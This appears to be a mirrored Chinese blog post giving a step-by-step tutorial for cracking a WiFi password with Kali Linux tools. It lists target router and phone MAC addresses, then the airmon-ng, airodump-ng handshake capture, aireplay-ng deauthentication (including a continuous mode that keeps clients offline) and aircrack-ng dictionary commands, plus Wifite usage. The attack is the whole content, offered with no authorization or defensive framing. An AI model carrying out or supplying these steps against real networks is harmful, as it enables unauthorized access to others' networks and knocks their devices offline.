zoukankan      html  css  js  c++  java
  • wifi破解

    路由器的

    78:44:FD:49:79:80

    手机的

    14:9D:09:C9:E2:ED

    一:环境准备

    kali系统

    密码字典(先将密码字典拷贝到kali系统中)

    自己写一个:里面包含wifi的密码

    vim /root/mima.txt

    aptech123

    二:破解流程

    1:连接无线网卡

     

    2:查看网卡状态

    Iwconfig

     

    3:设置网卡为监听模式

    airmon-ng check kill

    airmon-ng start wlan0

    4:扫描无线网络

    airodump-ng wlan0

    记录下来你要破解的那个路由器的BSSID,以及该路由器当前连接的手机的信息station

    还要记录下路由器使用的信号通道

    如果扫描不到,可以重复扫描,扫描到可以ctrl+c取消扫描,记下两个mac和信道

     

    5:抓取握手包(不要停止):

    airodump-ng -c 6 --ivs -w test --bssid 78:44:FD:49:79:80  wlan0

    -c:路由器使用的信号通道

    --ivs:将抓取到的包保存为ivs的文件格式

    -w:指定保存的握手包的名字

    --bssid:指定抓取到的路由器的物理地址

    wlan0:kali系统的无线网卡的名字

     

    6:再打开另一个终端对手机终端进行反认证攻击

    给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。

    aireplay-ng -0 10 -a 78:44:FD:49:79:80 -c 14:9D:09:C9:E2:ED wlan0

     

    -0(零):冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网

    -a:指定路由器的物理地址

    -c:指定手机的物理地址

    wlan0mon:kali系统的无线网卡的名字

    7:利用密码字典破解密码

    aircrack-ng -w /root/mima.txt /root/test-01.ivs

    Wifite工具

    root@kali:~# wifite –help

    root@kali:~# ifconfig wlan0 down

    root@kali:~# iwconfig wlan0 mode monitor

    root@kali:~# ifconfig wlan0 up

    root@kali:~# iwconfig

     

    root@kali:~#wifite

     

  • 相关阅读:
    SystemTap----常用变量、宏、函数和技巧
    RPM制作
    percona-MYSQLGUI监控
    Rsyslog配置文件详解
    理解 Linux 网络栈(1):Linux 网络协议栈简单总结 图
    tcp-backlog配置
    Clumsy logo差网络环境模拟工具 Clumsy
    Android Studio 配置模拟器AVD存放路径(默认在c盘,解决c盘空间不够问题)
    Android Studio 导入的项目编码错误问题
    21分钟 MySQL 入门教程
  • 原文地址:https://www.cnblogs.com/ccshi/p/13413389.html
Copyright © 2011-2022 走看看